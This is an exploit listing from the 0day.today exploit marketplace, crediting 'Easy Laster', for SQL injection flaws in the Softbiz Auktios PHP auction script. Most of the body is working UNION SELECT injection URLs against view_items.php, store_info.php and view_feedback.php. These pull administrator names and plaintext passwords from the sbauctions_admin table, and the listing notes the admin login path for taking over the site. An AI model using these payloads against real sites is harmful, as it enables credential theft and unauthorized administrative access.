[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Softbiz Auktios Script Multiple SQL Injection Vulnerabilities

Author
Easy Laster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11066
Category
web applications
Date add
24-02-2010
Platform
unsorted
=============================================================
Softbiz Auktios Script Multiple SQL Injection Vulnerabilities
=============================================================

----------------------------Information------------------------------------------------
+Name :  softbiz auktios script sql injection view_items.php
+Autor : Easy Laster
+Date   : 24.02.2010
+Script  : softbiz auktios script
+Download : -----
+Demo : http://ezpips.com/
+Price : 99$
+Language :PHP

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/view_items.php?id=
+Exploitable   : www.site.com/auktionscript/view_items.php?id=null+union+select+1,2,
3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin#
 
The Password save in Plaintext you must login in www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/store_info.php?id=
+Exploitable   : www.site.com/auktionscript/store_info.php?id=null+union+select+1,2,3
,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#
 
The Password save in Plaintext you must login in www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/view_feedback.php?id=
+Exploitable   : www.site.com/auktionscriptview_feedback.php?id=null+union+select+1,2,
3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin#
 
The Password save in Plaintext you must login in www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------
 
http://server/view_feedback.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat%28admin_name,0x3a,pwd%29,12,13,14,15,16,17,18+from+sbauctions_admin#



#  0day.today [2024-11-15]  #